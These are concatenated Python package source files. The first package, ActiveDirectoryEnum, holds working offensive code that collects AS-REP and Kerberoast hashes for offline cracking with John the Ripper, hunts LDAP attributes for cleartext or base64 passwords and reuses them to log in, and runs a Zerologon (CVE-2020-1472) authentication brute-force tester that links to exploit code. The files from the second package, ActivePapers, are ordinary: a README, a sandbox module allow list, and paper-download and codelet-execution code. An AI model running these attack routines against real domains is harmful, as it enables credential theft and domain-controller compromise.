with open(str(self.output) + '-groups', 'w') as f:
for item in self.groups:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-spn', 'w') as f:
for item in self.spn:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-acl', 'w') as f:
for item in self.acl:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-gpo', 'w') as f:
for item in self.gpo:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-domains', 'w') as f:
for item in self.domains:
f.write(str(item))
f.write("\n")
with open(str(self.output) + '-ous', 'w') as f:
for item in self.ous:
f.write(str(item))
f.write("\n")
print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output))
def enumKerbPre(self):
# Build user array
users = []
self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server))
if len(users) == 0:
print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that do not require Kerberos preauthentication'.format(len(users)))
elif len(users) == 1:
print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users)))
else:
print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that do not require Kerberos preauthentication'.format(len(users)))
hashes = []
# Build request for Tickets
for usr in users:
clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = str(self.server).upper()
serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacReq = KERB_PA_PAC_REQUEST()
pacReq['include-pac'] = True
encodedPacReq = encoder.encode(pacReq)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacReq
requestBody = seq_set(asReq, 'req-body')
options = list()
options.append(constants.KDCOptions.forwardable.value)
options.append(constants.KDCOptions.renewable.value)
options.append(constants.KDCOptions.proxiable.value)
requestBody['kdc-options'] = constants.encodeFlags(options)
seq_set(requestBody, 'sname', serverName.components_to_asn1)
seq_set(requestBody, 'cname', clientName.components_to_asn1)
requestBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
requestBody['till'] = KerberosTime.to_asn1(now)
requestBody['rtime'] = KerberosTime.to_asn1(now)
requestBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(requestBody, 'etype', supportedCiphers)
msg = encoder.encode(asReq)
try:
response = sendReceive(msg, domain, self.server)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(requestBody, 'etype', supportedCiphers)
msg = encoder.encode(asReq)
response = sendReceive(msg, domain, self.server)
else:
print(e)
continue
asRep = decoder.decode(response, asn1Spec=AS_REP())[0]
hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode()))
if len(hashes) > 0:
with open('{0}-jtr-hashes'.format(self.server), 'w') as f:
for h in hashes:
f.write(str(h) + '\n')
print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server))
else:
print('[ ' + colored('OK', 'green') +' ] Got 0 hashes')
def enumSPNUsers(self):
users_spn = {
}
user_tickets = {
}
userDomain = self.domuser.split('@')[1]
idx = 0
for entry in self.spn:
spns = json.loads(self.spn[idx].entry_to_json())
users_spn[self.splitJsonArr(spns['attributes'].get('name'))] = self.splitJsonArr(spns['attributes'].get('servicePrincipalName'))
idx += 1
# Get TGT for the supplied user
client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
try:
# We need to take the domain from the user@domain since it *could* be a cross-domain user
tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = newSession
for user, spn in users_spn.items():
if isinstance(spn, list):
# We only really need one to get a ticket
spn = spn[0]
else:
try:
# Get the TGS
serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey'])
# Decode the TGS
decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# Get different encryption types
if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
user_tickets[spn] = entry
elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
user_tickets[spn] = entry
except KerberosError:
# For now continue
# TODO: Maybe look deeper into issue here
continue
if len(user_tickets.keys()) > 0:
with open('{0}-spn-tickets'.format(self.server), 'w') as f:
for key, value in user_tickets.items():
f.write('{0}:{1}\n'.format(key, value))
if len(user_tickets.keys()) == 1:
print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist=<list> {1}-spn-tickets'.format(len(user_tickets.keys()), self.server))
else:
print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist=<list> {1}-spn-tickets'.format(len(user_tickets.keys()), self.server))
else:
print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys())))
except KerberosError as err:
print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1]))
def enumForCreds(self, ldapdump):
searchTerms = [
'legacy', 'pass', 'password', 'pwd', 'passcode'
]
excludeTerms = [
'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN'
]
possiblePass = {}
idx = 0
for _ in ldapdump:
user = json.loads(ldapdump[idx].entry_to_json())
for prop, value in user['attributes'].items():
if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms):
try:
possiblePass[user['attributes']['userPrincipalName'][0]] = value[0]
except KeyError:
# Could be a service user instead
try:
possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0]
except KeyError:
# Don't know which type
continue
idx += 1
if len(possiblePass) > 0:
print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties')
print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password')
for user, password in possiblePass.items():
try:
usr, passwd = self.entroPass(user, password)
except TypeError:
# None returned, just continue
continue
if not self.CREDS:
self.domuser = usr
self.passwd = passwd
self.runWithCreds()
return
def entroPass(self, user, password):
if not password:
return None
# First check if it is a clear text
dc_test_conn = Server(self.server, get_info=ALL)
test_conn = Connection(dc_test_conn, user=user, password=password)
test_conn.bind()
# Validate the login (bind) request
if int(test_conn.result['result']) != 0:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password))
else:
print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password))
else:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password))
else:
print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password))
print('')
return user, password
test_conn.unbind()
# Attempt for base64
# Could be base64, lets try
try:
pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8')
except base64.binascii.Error:
return None
# Attempt decoded PW
dc_test_conn = Server(self.server, get_info=ALL)
test_conn = Connection(dc_test_conn, user=user, password=pw)
test_conn.bind()
# Validate the login (bind) request
if int(test_conn.result['result']) != 0:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw))
else:
print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw))
else:
if self.CREDS:
print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw))
else:
print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw))
print('')
return user, pw
def main(args):
parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent('''
___ __ _ ____ _ __ ______
/ | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___
/ /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\
/ ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / /
/_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/
/____/
/*----------------------------------------------------------------------------------------------------------*/
'''))
parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller')
parser.add_argument('-o', '--out-file', type=str, help='Path to output file. If no path, CWD is assumed (default: None)')
parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `[email protected]`')
parser.add_argument('-s', '--secure', help='Try to establish connection through LDAPS', action='store_true')
parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true')
parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that do not require Kerberos preauthentication', action='store_true')
parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true')
parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true')
parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true')
parser.add_argument('--all', help='Run all checks', action='store_true')
parser.add_argument('--no-creds', help='Start without credentials', action='store_true')
parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true')
parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code')
exploits = {
"cve-2020-1472": "https://github.com/dirkjanm/CVE-2020-1472",
}
if len(args) == 1:
parser.print_help(sys.stderr)
sys.exit(0)
args = parser.parse_args()
if args.exploit:
if args.exploit.lower() in exploits.keys():
print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {exploits[args.exploit.lower()]}')
sys.exit(0)
else:
print(f'{args.exploit.lower()} not in embedded exploits')
sys.exit(0)
if not args.dc:
print("--dc argument is required")
sys.exit(0)
# If there's more than 4 subdomains (test.test.domain.local) - tough luck sunny boy
domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$')
userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$')
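# Illustrative matches (hypothetical values): 'domain.local' and 'sub.domain.local'
# satisfy domainRE, while '[email protected]' satisfies userRE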
domainMatch = domainRE.findall(args.dc)
if not domainMatch:
print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"')
sys.exit(1)
if args.all:
args.smb = True
args.kerberos_preauth = True
args.bloodhound = True
args.spn = True
if args.no_creds:
args.user = False
else:
userMatch = userRE.findall(args.user)
if not userMatch:
print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "[email protected]"')
sys.exit(1)
# Boolean flow control flags
file_to_write = None
if args.out_file:
file_to_write = args.out_file
enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.user)
# Just print a blank line for output sake
print('') | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/ade/__init__.py | __init__.py |
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be necessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
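# (Each attempt succeeds with probability ~1/256 against a vulnerable DC, so the
# chance of 2000 consecutive failures is (255/256)**2000, roughly 0.04%.)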
def fail(msg):
print(msg, file=sys.stderr)
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
except BaseException as ex:
fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
# Keep authenticating until successful. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
if __name__ == '__main__':
if not (3 <= len(sys.argv) <= 4):
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
sys.exit(1)
else:
[_, dc_name, dc_ip] = sys.argv
dc_name = dc_name.rstrip('$')
perform_attack('\\\\' + dc_name, dc_ip, dc_name) | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/ade/cve_2020_1472/__init__.py | __init__.py |
ActivePapers is a tool for working with executable papers, which
combine data, code, and documentation in single-file packages,
suitable for publication as supplementary material or on sites such as
[figshare](http://figshare.com).
The ActivePapers Python edition requires Python 2.7 or Python 3.3 to 3.5.
It also relies on the following libraries:
- NumPy 1.6 or later (http://numpy.scipy.org/)
- HDF5 1.8.7 or later (http://www.hdfgroup.org/HDF5/)
- h5py 2.2 or later (http://www.h5py.org/)
- tempdir 0.6 or later (http://pypi.python.org/pypi/tempdir/)
Installation of ActivePapers.Py:
python setup.py install
This installs the ActivePapers Python library and the command-line
tool "aptool" for managing ActivePapers.
For documentation, see the
[ActivePapers Web site](http://www.activepapers.org/python-edition/).
ActivePapers development takes place
[on Github](http://github.com/activepapers/activepapers-python).
Running the tests also requires the [tempdir](https://pypi.python.org/pypi/tempdir/) library and either the
[nose](http://pypi.python.org/pypi/nose/) or the [pytest](http://pytest.org) testing framework. The recommended way to run the tests is
```
cd tests
./run_all_tests.sh nosetests
```
or
```
cd tests
./run_all_tests.sh py.test
```
This launches the test runner on each test script individually. The simpler approach of running `nosetests` or `py.test` directly in directory `tests` leads to a few test failures, because the testing framework's import handling conflicts with the implementation of internal modules in ActivePapers.
| ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/README.md | README.md |
# The following is a complete list of modules in the standard library,
# obtained from an installation of Python 3.3. Only modules starting
# with an underscore were removed. Forbidden modules are commented out.
# The selection needs a more careful revision.
allowed_modules = [
"abc",
"aifc",
#"antigravity",
#"argparse",
"ast",
#"asynchat",
#"asyncore",
"base64",
"bdb",
"binhex",
"bisect",
"bz2",
#"cProfile",
"calendar",
#"cgi",
#"cgitb",
"chunk",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"compileall",
#"concurrent",
"configparser",
"contextlib",
"copy",
"copyreg",
"crypt",
"csv",
#"ctypes",
#"curses",
"datetime",
#"dbm",
"decimal",
"difflib",
#"dis",
#"distutils",
#"doctest",
#"dummy_threading",
#"email",
"encodings",
"filecmp",
"fileinput",
"fnmatch",
"formatter",
"fractions",
#"ftplib",
"functools",
#"genericpath",
#"getopt",
#"getpass",
"gettext",
#"glob",
"gzip",
"hashlib",
"heapq",
"hmac",
"html",
#"http",
#"idlelib",
#"imaplib",
"imghdr",
#"imp",
#"importlib",
"inspect",
#"io",
#"ipaddress",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
"lzma",
#"macpath",
#"macurl2path",
#"mailbox",
#"mailcap",
"mimetypes",
#"modulefinder",
#"multiprocessing",
#"netrc",
#"nntplib",
#"ntpath",
#"nturl2path",
"numbers",
"opcode",
#"optparse",
"os",
"os2emxpath",
#"pdb",
"pickle",
"pickletools",
"pipes",
#"pkgutil",
"plistlib",
"poplib",
"posixpath",
"pprint",
"profile",
"pstats",
"pty",
"py_compile",
"pyclbr",
"pydoc",
"pydoc_data",
"queue",
"quopri",
"random",
"re",
"reprlib",
"rlcompleter",
"runpy",
"sched",
"shelve",
"shlex",
"shutil",
#"site",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"socketserver",
#"sqlite3",
"sre_compile",
"sre_constants",
"sre_parse",
#"ssl",
#"stat",
"string",
"stringprep",
"struct",
#"subprocess",
#"sunau",
"symbol",
"symtable",
"sysconfig",
"tabnanny",
"tarfile",
#"telnetlib",
#"tempfile",
"test",
"textwrap",
#"this",
#"threading",
"timeit",
#"tkinter",
"token",
"tokenize",
"trace",
#"traceback",
"tty",
"turtle",
"turtledemo",
"types",
#"unittest",
#"urllib",
"uu",
#"uuid",
"venv",
"warnings",
#"wave",
"weakref",
#"webbrowser",
#"wsgiref",
"xdrlib",
"xml",
"xmlrpc",
"zipfile",
## extension modules
"array",
"atexit",
#"audioop",
"binascii",
"bz2",
"cmath",
"crypt",
#"fcntl",
#"grp",
"math",
#"mmap",
#"nis",
"parser",
"pyexpat",
#"readline",
#"resource",
#"select",
#"syslog",
#"termios",
"time",
"unicodedata",
"zlib",
] | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/standardlib3.py | standardlib3.py |
import json
import os
from activepapers import url
#
# The ACTIVEPAPERS_LIBRARY environment variable follows the
# same conventions as PATH under Unix.
#
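# Example setting (hypothetical paths):
#   ACTIVEPAPERS_LIBRARY=/home/user/papers:/srv/activepapers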
library = os.environ.get('ACTIVEPAPERS_LIBRARY', None)
if library is None:
# This is Unix-only, needs a Windows equivalent
home = os.environ.get('HOME', None)
if home is None:
library = ""
else:
library = os.path.join(home, '.activepapers')
if not os.path.exists(library):
try:
os.mkdir(library)
except (IOError, OSError):
library = ""
if not os.path.exists(library):
library = ""
library = library.split(':')
def split_paper_ref(paper_ref):
index = paper_ref.find(':')
if index == -1:
raise ValueError("invalid paper reference %s" % paper_ref)
return paper_ref[:index].lower(), paper_ref[index+1:]
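# For instance (hypothetical reference), split_paper_ref('doi:10.5281/zenodo.7648')
# returns ('doi', '10.5281/zenodo.7648').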
#
# Return the local filename for a paper reference,
# after downloading the file if required.
#
def _get_local_file(label):
filename = label + '.ap'
for dir in library:
full_name = os.path.join(dir, "local", filename)
if os.path.exists(full_name):
return full_name
raise IOError(2, "No such ActivePaper: 'local:%s' (filename: %s)"
% (label, full_name))
def _get_figshare_doi(label, local_filename):
figshare_url = "http://api.figshare.com/v1/articles/%s" % label
try:
response = url.urlopen(figshare_url)
json_data = response.read().decode("utf-8")
except url.HTTPError:
raise ValueError("Not a figshare DOI: %s" % label)
article_details = json.loads(json_data)
download_url = article_details['items'][0]['files'][0]['download_url']
url.urlretrieve(download_url, local_filename)
return local_filename
def _get_zenodo_doi(label, local_filename):
try:
# Python 2
from HTMLParser import HTMLParser
bytes2text = lambda x: x
except ImportError:
# Python 3
from html.parser import HTMLParser
def bytes2text(b):
return b.decode(encoding="utf8")
class ZenodoParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == "link":
attrs = dict(attrs)
if attrs.get("rel") == "alternate" \
and attrs.get("type") != "application/rss+xml":
self.link_href = attrs.get("href")
self.link_type = attrs.get("type")
zenodo_url = "http://dx.doi.org/" + label
parser = ZenodoParser()
source = url.urlopen(zenodo_url)
try:
parser.feed(bytes2text(source.read()))
finally:
source.close()
assert parser.link_type == "application/octet-stream"
download_url = parser.link_href
url.urlretrieve(download_url, local_filename)
return local_filename
def _get_doi(label):
local_filename = os.path.join(library[0], label + ".ap")
if os.path.exists(local_filename):
return local_filename
dir_name = os.path.join(library[0], label.split("/")[0])
if not os.path.exists(dir_name):
os.mkdir(dir_name)
# There doesn't seem to be a way to download an
# arbitrary digital object through its DOI. We only know
# how to do it for figshare and Zenodo, which are
# each handled by specialized code.
# Figshare
if 'figshare' in label:
return _get_figshare_doi(label, local_filename)
# Zenodo
elif 'zenodo' in label:
return _get_zenodo_doi(label, local_filename)
# Nothing else works for now
else:
raise ValueError("Unrecognized DOI: %s" % label)
def _get_file_in_cwd(label):
filename = label + '.ap'
full_name = os.path.abspath(os.path.join(os.getcwd(), filename))
if os.path.exists(full_name):
return full_name
raise IOError(2, "No such ActivePaper: 'cwd:%s' (filename: %s)"
% (label, full_name))
download_handlers = {'local': _get_local_file,
'doi': _get_doi,
'cwd': _get_file_in_cwd}
def find_in_library(paper_ref):
ref_type, label = split_paper_ref(paper_ref)
handler = download_handlers.get(ref_type)
assert handler is not None
return handler(label) | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/library.py | library.py |
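# Minimal usage sketch (the labels are hypothetical):
#
#     find_in_library('local:my-paper')   # -> <library-dir>/local/my-paper.ap
#     find_in_library('cwd:my-paper')     # -> ./my-paper.ap in the current directory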
import imp
import collections
import os
import sys
import threading
import traceback
import weakref
import logging
import h5py
import numpy as np
import activepapers.utility
from activepapers.utility import ascii, utf8, isstring, execcode, \
codepath, datapath, path_in_section, owner, \
datatype, language, \
timestamp, stamp, ms_since_epoch
import activepapers.standardlib
#
# A codelet is a Python script inside a paper.
#
# Codelets come in several varieties:
#
# - Calclets can only access datasets inside the paper.
# Their computations are reproducible.
#
# - Importlets create datasets in the paper based on external resources.
# Their results are not reproducible, and in general they are not
# executable in a different environment. They are stored as documentation
# and for manual re-execution.
#
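# A minimal calclet sketch (dataset names are illustrative; assumes a dataset
# 'input' already exists in the paper):
#
#     from activepapers.contents import data, open
#     values = data['input'][...]
#     data['result'] = 2 * values
#     with open('log.txt', 'w') as f:
#         f.write('done\n')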
class Codelet(object):
def __init__(self, paper, node):
self.paper = paper
self.node = node
self._dependencies = None
assert node.name.startswith('/code/')
self.path = node.name
def dependency_attributes(self):
if self._dependencies is None:
return {'ACTIVE_PAPER_GENERATING_CODELET': self.path}
else:
deps = list(self._dependencies)
deps.append(ascii(self.path))
deps.sort()
return {'ACTIVE_PAPER_GENERATING_CODELET': self.path,
'ACTIVE_PAPER_DEPENDENCIES': deps}
def add_dependency(self, dependency):
pass
def owns(self, node):
return owner(node) == self.path
def _open_file(self, path, mode, encoding, section):
if path.startswith(os.path.expanduser('~')):
# Catch obvious attempts to access real files
# rather than internal ones.
raise IOError((13, "Permission denied: '%s'" % path))
path = path_in_section(path, section)
if not path.startswith('/'):
path = section + '/' + path
f = self.paper.open_internal_file(path, mode, encoding, self)
f._set_attribute_callback(self.dependency_attributes)
if mode[0] == 'r':
self.add_dependency(f._ds.name)
return f
def open_data_file(self, path, mode='r', encoding=None):
return self._open_file(path, mode, encoding, '/data')
def open_documentation_file(self, path, mode='r', encoding=None):
return self._open_file(path, mode, encoding, '/documentation')
def exception_traceback(self):
from traceback import extract_tb, print_exc
import sys
tb = sys.exc_info()[2]
node, line, fn_name, _ = extract_tb(tb, limit=2)[1]
paper_id, path = node.split(':')
return CodeFile(self.paper, self.paper.file[path]), line, fn_name
def _run(self, environment):
logging.info("Running %s %s"
% (self.__class__.__name__.lower(), self.path))
self.paper.remove_owned_by(self.path)
# A string uniquely identifying the paper from which the
# calclet is called. Used in Importer.
script = utf8(self.node[...].flat[0])
script = compile(script, ':'.join([self.paper._id(), self.path]), 'exec')
self._contents_module = imp.new_module('activepapers.contents')
self._contents_module.data = DataGroup(self.paper, None,
self.paper.data_group, self)
self._contents_module.code = CodeGroup(self.paper,
self.paper.code_group)
self._contents_module.open = self.open_data_file
self._contents_module.open_documentation = self.open_documentation_file
self._contents_module.snapshot = self.paper.snapshot
self._contents_module.exception_traceback = self.exception_traceback
# The remaining part of this method is not thread-safe because
# of the way the global state in sys.modules is modified.
with codelet_lock:
try:
codelet_registry[(self.paper._id(), self.path)] = self
for name, module in self.paper._local_modules.items():
assert name not in sys.modules
sys.modules[name] = module
sys.modules['activepapers.contents'] = self._contents_module
execcode(script, environment)
finally:
del codelet_registry[(self.paper._id(), self.path)]
self._contents_module = None
if 'activepapers.contents' in sys.modules:
del sys.modules['activepapers.contents']
for name, module in self.paper._local_modules.items():
del sys.modules[name]
codelet_lock = threading.Lock()
#
# Importlets are run in the normal Python environment, with in
# addition access to the special module activepapers.contents.
#
# All data generation is traced during importlet execution in order to
# build the dependency graph.
#
# Importlets are allowed to read any dataset except those they
# generated themselves. This is not enforced at the moment.
#
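# A minimal importlet sketch (module usage and URL are illustrative only):
#
#     from activepapers.contents import open
#     from urllib.request import urlopen       # external access is allowed here
#     text = urlopen('http://example.org/data.csv').read().decode('utf-8')
#     with open('raw/data.csv', 'w') as f:
#         f.write(text)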
class Importlet(Codelet):
def run(self):
environment = {'__builtins__': activepapers.utility.builtins.__dict__}
self._run(environment)
def track_and_check_import(self, module_name):
return
#
# Calclets are run in a restricted execution environment:
# - many items removed from __builtins__
# - modified __import__ for tracking and verifying imports
# - an import hook for accessing modules stored in the paper
#
# All data access and data generation is traced during calclet
# execution in order to build the dependency graph.
#
class Calclet(Codelet):
def run(self):
self._dependencies = set()
environment = {'__builtins__':
activepapers.utility.ap_builtins.__dict__}
self._run(environment)
def add_dependency(self, dependency):
assert isinstance(self._dependencies, set)
self._dependencies.add(ascii(dependency))
def track_and_check_import(self, module_name):
if module_name == 'activepapers.contents':
return
node = self.paper.get_local_module(module_name)
if node is None:
top_level = module_name.split('.')[0]
if top_level not in self.paper.dependencies \
and top_level not in activepapers.standardlib.allowed_modules \
and top_level not in ['numpy', 'h5py']:
raise ImportError("import of %s not allowed" % module_name)
else:
if datatype(node) != "module":
node = node.get("__init__", None)
if node is not None and node.in_paper(self.paper):
self.add_dependency(node.name)
#
# The attrs attribute of datasets and groups is wrapped
# by a class that makes the attributes used by ACTIVE_PAPERS
# invisible to calclet code.
#
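# For example, from calclet code (sketch; 'ds' stands for any wrapped dataset):
#
#     ds.attrs['units'] = 'nm'                       # stored as an HDF5 attribute
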